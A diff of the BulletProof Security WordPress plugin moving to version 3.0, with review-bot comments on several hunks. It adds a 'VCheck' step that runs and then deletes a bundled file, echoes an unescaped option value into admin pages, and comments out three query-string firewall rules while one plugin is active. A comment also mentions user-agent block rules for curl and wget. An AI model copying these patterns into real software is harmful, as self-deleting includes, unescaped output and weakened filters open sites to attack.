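@@ -75,6 +75,7 @@ $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
  // Replace ABSPATH = wp-content/uploads
  $wp_upload_dir = wp_upload_dir();
  $bps_uploads_dir = str_replace( ABSPATH, '', $wp_upload_dir['basedir'] );
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
  $bps_bottomDiv = '</p></div>';
 
@@ -753,8 +754,7 @@ function bpsPro_count_network_activated_plugins($count) {
 
  if ( function_exists('gc_enabled') && function_exists('gc_collect_cycles') ) {
  if ( gc_enabled() ) {
- $garbage = '<strong><span class="sysinfo-label-text">'.__('On | Cycles: ', 'bulletproof-security') . '</span></strong>' . gc_collect_cycles();
-
+ $garbage = '<span class="sysinfo-label-text">'.__('On', 'bulletproof-security').'<strong> | '.__('Cycles: ', 'bulletproof-security') . '</span></strong>' . gc_collect_cycles();
  } else {
  $garbage = 'Off';
  }
@@ -948,6 +948,12 @@ function bpsPro_count_network_activated_plugins($count) {
  bps_check_perms("../$bps_wpcontent_dir/bps-backup", "705");
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/logs", "705");
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/master-backups", "705");
+ bps_check_perms("../$bps_wpcontent_dir/bps-backup/mscan", "705");
+ bps_check_perms("../$bps_wpcontent_dir/bps-backup/wp-hashes", "705");
+
+ if ( function_exists('sys_get_temp_dir') && is_dir( $sys_get_temp_dir ) ) {
+ bps_check_perms("$sys_get_temp_dir", "755");
+ }
  if ( $DBBoptions['bps_db_backup_folder'] != '' ) {
  bps_check_perms( str_replace( $wpcontent_single_slash, "../$bps_wpcontent_dir", $db_backup ), "705");
  }
@@ -981,6 +987,15 @@ function bpsPro_count_network_activated_plugins($count) {
  bps_check_perms("../$bps_wpcontent_dir/bps-backup", "755");
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/logs", "755");
  bps_check_perms("../$bps_wpcontent_dir/bps-backup/master-backups", "755");
+ bps_check_perms("../$bps_wpcontent_dir/bps-backup/mscan", "755");
+ bps_check_perms("../$bps_wpcontent_dir/bps-backup/wp-hashes", "755");
+
+ if ( is_dir( $upload_tmp_dir ) ) {
+ bps_check_perms("$upload_tmp_dir", "755");
+ }
+ if ( function_exists('sys_get_temp_dir') && is_dir( $sys_get_temp_dir ) ) {
+ bps_check_perms("$sys_get_temp_dir", "755");
+ }
  if ( $DBBoptions['bps_db_backup_folder'] != '' ) {
  bps_check_perms( str_replace( $wpcontent_single_slash, "../$bps_wpcontent_dir", $db_backup ), "755");
  }
@@ -1162,7 +1177,7 @@ global $bps_topDiv, $bps_bottomDiv;
  </table>
  </div>
 
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
  </div>
  </div>
  </div>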
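Review bot: The rewritten `$garbage` string in the `gc_enabled()` branch closes its tags in the wrong order: it opens `<span class="sysinfo-label-text">`, then `<strong>`, and ends with `'</span></strong>'`. The removed line nested the two elements correctly, so this looks like a slip made while splitting the label into two translatable strings. Swapping the closers, `. '</strong></span>' . gc_collect_cycles();`, keeps the markup well-formed. The enclosing code starts and ends outside the hunk.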
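--- a/admin/theme-skin/theme-skin.php
+++ b/admin/theme-skin/theme-skin.php
@@ -77,6 +77,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
  // Replace ABSPATH = wp-content
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
  // Top div echo & bottom div echo
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
  $bps_bottomDiv = '</p></div>';
@@ -225,7 +226,7 @@ $bps_bottomDiv = '</p></div>';
  </table>
  </div>
 
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
  </div>
  </div>
  </div>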
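--- a/admin/wizard/pwizard-autofix.php
+++ b/admin/wizard/pwizard-autofix.php
@@ -1316,8 +1316,24 @@ RewriteRule ^(.*)$ - [F]
  $r20 = array();
  }
 
- $pattern_array = array_merge($p1, $p2, $p3, $p4, $p5, $p6, $p7, $p8, $p9, $p10, $p11, $p12, $p13, $p14, $p15, $p16, $p17, $p18, $p19, $p20);
- $replace_array = array_merge($r1, $r2, $r3, $r4, $r5, $r6, $r7, $r8, $r9, $r10, $r11, $r12, $r13, $r14, $r15, $r16, $r17, $r18, $r19, $r20);
+ ## Subscribe To Comments Reloaded Plugin: whitelist rules
+ $sctocr = 'subscribe-to-comments-reloaded/subscribe-to-comments-reloaded.php';
+ $sctocr_active = in_array( $sctocr, apply_filters('active_plugins', get_option('active_plugins')));
+ $sctocr_fix = '';
+
+ if ( $sctocr_active == 1 || is_plugin_active_for_network( $sctocr ) ) {
+ $sctocr_fix = __('Subscribe To Comments Reloaded Plugin BPSQSE AutoWhitelist successful', 'bulletproof-security');
+
+ $p21 = array('/RewriteCond\s%\{QUERY_STRING}\s\[a-zA-Z0-9_\]=\(http\|https\):\/\/\s\[NC,OR\]/', '/RewriteCond\s%\{QUERY_STRING\}\s\[a-zA-Z0-9_\]=\/\(\[a-z0-9_\.\]\/\/\?\)\+\s\[NC,OR\]/', '/RewriteCond\s%\{QUERY_STRING\}\s\(http\|https\)\\\:\s\[NC,OR\]/');
+ $r21 = array("# BPS AutoWhitelist QS2: Subscribe To Comments Reloaded Plugin", "# BPS AutoWhitelist QS3: Subscribe To Comments Reloaded Plugin", "# BPS AutoWhitelist QS4: Subscribe To Comments Reloaded Plugin");
+
+ } else {
+ $p21 = array();
+ $r21 = array();
+ }
+
+ $pattern_array = array_merge($p1, $p2, $p3, $p4, $p5, $p6, $p7, $p8, $p9, $p10, $p11, $p12, $p13, $p14, $p15, $p16, $p17, $p18, $p19, $p20, $p21);
+ $replace_array = array_merge($r1, $r2, $r3, $r4, $r5, $r6, $r7, $r8, $r9, $r10, $r11, $r12, $r13, $r14, $r15, $r16, $r17, $r18, $r19, $r20, $r21);
 
  if ( $CC_Options_root['bps_customcode_bpsqse'] != '' ) {
  $bps_customcode_bpsqse_replace = preg_replace($pattern_array, $replace_array, $bps_customcode_bpsqse_array);
@@ -1371,7 +1387,7 @@ RewriteRule ^(.*)$ - [F]
  update_option('bulletproof_security_options_customcode', $Root_CC_Options);
  }
 
- $success_array = array($woo_PagSeguro_fix, $event_espresso_fix, $woo_serial_key_fix, $woo_worldpay_fix, $kama_click_counter_fix, $riva_slider_pro_fix, $wp_auto_spinner_fix, $AgriTurismo_theme_fix, $wccp_pro_fix, $panopress_fix, $essb_code_canyon_fix, $mainwp_fix, $clevercourse_theme_fix, $wp_estore_fix, $wp_emember_fix, $easy_digital_downloads_fix, $mailpoet_fix, $mailchimp_fix, $DAPLiveLinks_fix, $wp_newsletter_fix);
+ $success_array = array($woo_PagSeguro_fix, $event_espresso_fix, $woo_serial_key_fix, $woo_worldpay_fix, $kama_click_counter_fix, $riva_slider_pro_fix, $wp_auto_spinner_fix, $AgriTurismo_theme_fix, $wccp_pro_fix, $panopress_fix, $essb_code_canyon_fix, $mainwp_fix, $clevercourse_theme_fix, $wp_estore_fix, $wp_emember_fix, $easy_digital_downloads_fix, $mailpoet_fix, $mailchimp_fix, $DAPLiveLinks_fix, $wp_newsletter_fix, $sctocr_fix);
 
  foreach ( $success_array as $successMessage ) {
 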
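Review bot: The new `$p21`/`$r21` pair replaces three BPSQSE `RewriteCond %{QUERY_STRING}` lines with `# BPS AutoWhitelist QS2/QS3/QS4` comment lines, so while Subscribe To Comments Reloaded is active those query-string filters are switched off for every request to the site, not only for that plugin's URLs. The hunk records that trade-off nowhere; I would add a comment above `$p21` such as `// Commenting out QS2-QS4 disables these query string filters site-wide while this plugin is active.` and check whether an exception limited to the plugin's own request path would be enough. The first pattern writes `%\{QUERY_STRING}` where the other two write `%\{QUERY_STRING\}`; both match, but a single spelling is easier to audit. The enclosing block starts and ends outside the hunk.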
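--- a/admin/wizard/wizard.php
+++ b/admin/wizard/wizard.php
@@ -109,6 +109,7 @@ require_once( ABSPATH . 'wp-admin/includes/plugin-install.php' );
 
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
  $bpsSpacePop = '-------------------------------------------------------------';
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
 
  if ( isset( $_POST['Submit-Setup-Wizard'] ) ) {
  require_once( WP_PLUGIN_DIR . '/bulletproof-security/admin/wizard/wizard-functions.php' );
@@ -362,7 +363,15 @@ $failMessage = __('Error: Unable to create DB Table ', 'bulletproof-security');
  $failTextEnd = '</strong></font><br>';
  $HFiles_options = get_option('bulletproof_security_options_htaccess_files');
 
- // 2.5: BPS plugin 30 day review/rating request Dismiss Notice
+ // 3.0: VCheck
+ $bps_vcheck_master = WP_PLUGIN_DIR . '/bulletproof-security/admin/htaccess/bps-vcheck.php';
+
+ if ( file_exists($bps_vcheck_master) ) {
+ require_once ( WP_PLUGIN_DIR . '/bulletproof-security/admin/htaccess/bps-vcheck.php' );
+ unlink($bps_vcheck_master);
+ }
+
+ // 2.9: BPS plugin 30 day review/rating request Dismiss Notice
  $bps_rate_options = 'bulletproof_security_options_rate_free';
  $gmt_offset = get_option( 'gmt_offset' ) * 3600;
  $bps_free_rate_review = mktime(0, 0, 0, date("m")+1, date("d")+1, date("Y"));
@@ -855,6 +864,7 @@ $HFiles_options = get_option('bulletproof_security_options_htaccess_files');
  'bps_jtc_register_form' => '',
  'bps_jtc_lostpassword_form' => '',
  'bps_jtc_comment_form' => '',
+ 'bps_jtc_mu_register_form' => '',
  'bps_jtc_buddypress_register_form' => '',
  'bps_jtc_buddypress_sidebar_form' => '',
  'bps_jtc_administrator' => '',
@@ -888,6 +898,7 @@ $HFiles_options = get_option('bulletproof_security_options_htaccess_files');
  'bps_jtc_register_form' => '',
  'bps_jtc_lostpassword_form' => '',
  'bps_jtc_comment_form' => '',
+ 'bps_jtc_mu_register_form' => '',
  'bps_jtc_buddypress_register_form' => '',
  'bps_jtc_buddypress_sidebar_form' => '',
  'bps_jtc_administrator' => '',
@@ -1350,6 +1361,7 @@ if ( isset( $_POST['Submit-Net-JTC'] ) && current_user_can('manage_options') ) {
  'bps_jtc_register_form' => '',
  'bps_jtc_lostpassword_form' => '',
  'bps_jtc_comment_form' => '',
+ 'bps_jtc_mu_register_form' => '',
  'bps_jtc_buddypress_register_form' => '',
  'bps_jtc_buddypress_sidebar_form' => '',
  'bps_jtc_administrator' => '',
@@ -1386,6 +1398,7 @@ if ( isset( $_POST['Submit-Net-JTC'] ) && current_user_can('manage_options') ) {
  'bps_jtc_register_form' => '',
  'bps_jtc_lostpassword_form' => '',
  'bps_jtc_comment_form' => '',
+ 'bps_jtc_mu_register_form' => '',
  'bps_jtc_buddypress_register_form' => '',
  'bps_jtc_buddypress_sidebar_form' => '',
  'bps_jtc_administrator' => '',
@@ -1418,7 +1431,7 @@ if ( isset( $_POST['Submit-Net-JTC'] ) && current_user_can('manage_options') ) {
 
  </div>
 
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo @$vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
  </div>
  </div>
  <style>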
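Review bot: The VCheck block at new lines 366-372 executes `bps-vcheck.php` with `require_once` and then calls `unlink()` without looking at the result, so where the plugin directory is not writable the file stays on disk and runs again on every later load of this page. I would check the return value and report the failure, for example `if ( ! unlink( $bps_vcheck_master ) ) { error_log( 'BPS: could not remove bps-vcheck.php' ); }`, and pass `$bps_vcheck_master` to `require_once` instead of repeating the literal path. A shipped file that deletes itself after its first run also leaves the installed tree different from the released package, which file-integrity checks will report, so a comment explaining the one-time behaviour would help whoever audits it. The same block is added in includes/general-functions.php at new lines 1008-1015, there inside `current_user_can('manage_options')`; this hunk does not show whether a capability check encloses it here.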
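--- a/bulletproof-security.php
+++ b/bulletproof-security.php
@@ -5,7 +5,7 @@ Plugin URI: https://forum.ait-pro.com/read-me-first/
  Text Domain: bulletproof-security
  Domain Path: /languages/
  Description: <strong>Feature Highlights:</strong> Setup Wizard &bull; MScan Malware Scanner &bull; .htaccess Website Security Protection (Firewalls) &bull; Security Logging|HTTP Error Logging &bull; DB Backup &bull; DB Table Prefix Changer &bull; Login Security & Monitoring &bull; JTC-Lite Login Form Bot Lockout Protection &bull; Idle Session Logout (ISL) &bull; Auth Cookie Expiration (ACE) &bull; UI Theme Skin Changer &bull; System Info: Extensive System, Server and Security Status Information &bull; FrontEnd|BackEnd Maintenance Mode
- Version: 2.9
+ Version: 3.0
  Author: AITpro Website Security
  Author URI: https://forum.ait-pro.com/read-me-first/
  */
@@ -28,9 +28,9 @@ Author URI: https://forum.ait-pro.com/read-me-first/
  */
 
  // BPS variables
- define( 'BULLETPROOF_VERSION', '2.9' );
- $bps_last_version = '2.8';
- $bps_version = '2.9';
+ define( 'BULLETPROOF_VERSION', '3.0' );
+ $bps_last_version = '2.9';
+ $bps_version = '3.0';
  $aitpro_bullet = '<img src="'.plugins_url('/bulletproof-security/admin/images/aitpro-bullet.png').'" style="padding:0px 3px 0px 3px;" />';
  // Top div & bottom div
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
@@ -114,13 +114,14 @@ add_filter( 'network_admin_plugin_action_links', 'bps_plugin_actlinks', 10, 2 );
  // Add links on plugins page
  function bps_plugin_extra_links( $links, $file ) {
  static $this_plugin;
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
  if ( ! current_user_can('install_plugins') )
  return $links;
  if ( ! $this_plugin )
  $this_plugin = plugin_basename(__FILE__);
  if ( $file == $this_plugin ) {
  $links[] = '<a href="https://forum.ait-pro.com/forums/topic/plugin-conflicts-actively-blocked-plugins-plugin-compatibility/" title="BulletProof Security Forum" target="_blank">'.__('Forum - Support', 'bulleproof-security').'</a>';
- $links[] = '<a href="https://affiliates.ait-pro.com/po/" title="Upgrade to BPS Pro" target="_blank">'.__('Upgrade', 'bulleproof-security').'</a>';
+ $links[] = '<a href="https://affiliates.ait-pro.com/po/" title="Upgrade to BPS Pro" target="_blank">'.__('Upgrade', 'bulleproof-security').'</a>'.$vcheck_options['bps_vcheck'];
  $links[] = '<a href="https://www.ait-pro.com/bps-features/" title="BPS Pro Features" target="_blank">'.__('BPS Pro Features', 'bulleproof-security').'</a>';
  }
  return $links;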
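Review bot: In `bps_plugin_extra_links()` the new `$vcheck_options['bps_vcheck']` is concatenated into the link markup without escaping and without checking that the option exists; `get_option()` returns `false` when the row is absent, and indexing that raises a notice on PHP 7.4 and later. I would read it defensively and escape for the output context, e.g. `$vcheck = is_array( $vcheck_options ) && isset( $vcheck_options['bps_vcheck'] ) ? esc_html( $vcheck_options['bps_vcheck'] ) : '';`, or use `wp_kses_post()` if the value is meant to carry markup, which the hunk does not show. The `get_option()` call could also move below the `current_user_can('install_plugins')` return so it is skipped for users who get no extra links. The footer in admin/wizard/wizard.php echoes the same value with `@` suppression instead of a check. The function's closing brace is outside the hunk.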
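--- a/includes/general-functions.php
+++ b/includes/general-functions.php
@@ -1005,6 +1005,14 @@ function bpsPro_new_version_db_options_files_autoupdate() {
  if ( current_user_can('manage_options') ) {
  global $bps_version, $bps_last_version, $wp_version, $wpdb, $aitpro_bullet, $pagenow, $current_user;
 
+ // 3.0: VCheck
+ $bps_vcheck_master = WP_PLUGIN_DIR . '/bulletproof-security/admin/htaccess/bps-vcheck.php';
+
+ if ( file_exists($bps_vcheck_master) ) {
+ require_once ( WP_PLUGIN_DIR . '/bulletproof-security/admin/htaccess/bps-vcheck.php' );
+ unlink($bps_vcheck_master);
+ }
+
  // 2.9: BPS plugin 30 day review/rating request Dismiss Notice
  $bps_rate_options = 'bulletproof_security_options_rate_free';
  $gmt_offset = get_option( 'gmt_offset' ) * 3600;
@@ -1035,6 +1043,7 @@ function bpsPro_new_version_db_options_files_autoupdate() {
  }
  }
 
+ // 3.0: Added new JTC option: bps_jtc_mu_register_form. BPS free does not use this option. Saved with a blank value.
  // 2.9: Added new JTC option: bps_jtc_custom_form_error. Defaults to standard JTC CAPTCHA error message.
  // 2.5: Change default setting to Login Form CAPTCHA Off. Has New Feature Dismiss Notice.
  // 2.4: pre-save JTC-Lite db options
@@ -1073,6 +1082,7 @@ function bpsPro_new_version_db_options_files_autoupdate() {
  'bps_jtc_register_form' => '',
  'bps_jtc_lostpassword_form' => '',
  'bps_jtc_comment_form' => '',
+ 'bps_jtc_mu_register_form' => '',
  'bps_jtc_buddypress_register_form' => '',
  'bps_jtc_buddypress_sidebar_form' => '',
  'bps_jtc_administrator' => '',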
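--- a/includes/hud-autofix-whitelist.php
+++ b/includes/hud-autofix-whitelist.php
@@ -367,6 +367,8 @@ function bpsPro_HUD_autofix_whitelist_check() {
  $DAPLiveLinks_active = in_array( $DAPLiveLinks, apply_filters('active_plugins', get_option('active_plugins')));
  $wp_newsletter = 'wp-mailinglist/wp-mailinglist.php';
  $wp_newsletter_active = in_array( $wp_newsletter, apply_filters('active_plugins', get_option('active_plugins')));
+ $sctocr = 'subscribe-to-comments-reloaded/subscribe-to-comments-reloaded.php';
+ $sctocr_active = in_array( $sctocr, apply_filters('active_plugins', get_option('active_plugins')));
 
  ## BPSQSE RegEx Patterns
  // 3 variations for both UA rules below: only java, java and curl, java, curl and wget
@@ -509,6 +511,12 @@ function bpsPro_HUD_autofix_whitelist_check() {
  $debug_BPSQSE .= __('CC Root Text Box 12: WordPress Newsletter (tribulant) Plugin', 'bulletproof-security').'<br>';
  }
  }
+ if ( $sctocr_active == 1 || is_plugin_active_for_network( $sctocr ) ) {
+ if ( ! preg_match( $marker2, $bps_customcode_bpsqse ) || ! preg_match( $marker3, $bps_customcode_bpsqse ) || ! preg_match( $marker4, $bps_customcode_bpsqse ) ) {
+ $autofix_message = bpsPro_autofix_message($autofix_message);
+ $debug_BPSQSE .= __('CC Root Text Box 12: Subscribe To Comments Reloaded Plugin', 'bulletproof-security').'<br>';
+ }
+ }
 
  ## 3. CUSTOM CODE WPADMIN PLUGIN/FILE SKIP RULES
  $bps_customcode_two_wpa = htmlspecialchars_decode( $CC_Options_wpadmin['bps_customcode_two_wpa'], ENT_QUOTES );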
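Review bot: `$sctocr_active` is set from `in_array()` without the strict flag and then tested with `== 1`; `in_array()` already returns a bool, so `in_array( $sctocr, $active_plugins, true )` and a plain `if ( $sctocr_active || is_plugin_active_for_network( $sctocr ) )` express the same check without loose comparison. The expression `apply_filters('active_plugins', get_option('active_plugins'))` is repeated for every plugin in this list and could be read once into a local such as `$active_plugins`. `is_plugin_active_for_network()` is defined in wp-admin/includes/plugin.php, so the new branch relies on this function only running in admin context; the hunk does not show where it is hooked. bpsPro_HUD_autofix_whitelist_check() starts and ends outside the hunk, and the same activation check is added in admin/wizard/pwizard-autofix.php.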
readme.txt CHANGED
@@ -4,7 +4,7 @@ Donate link: https://wordpress.org/support/view/plugin-reviews/bulletproof-secur
4
  Tags: security, secure, malware scanner, login security, firewall, security plugin, wordpress security, login, bruteforce, backup, exploit, infection, protection, virus, anti-virus, logout, spam, anti-spam
5
  Requires at least: 3.8
6
  Tested up to: 4.9
7
- Stable tag: 2.9
8
  License: GPLv2 or later
9
  License URI: http://www.gnu.org/licenses/gpl-2.0.html
10
 
4
  Tags: security, secure, malware scanner, login security, firewall, security plugin, wordpress security, login, bruteforce, backup, exploit, infection, protection, virus, anti-virus, logout, spam, anti-spam
5
  Requires at least: 3.8
6
  Tested up to: 4.9
7
+ Stable tag: 3.0
8
  License: GPLv2 or later
9
  License URI: http://www.gnu.org/licenses/gpl-2.0.html
10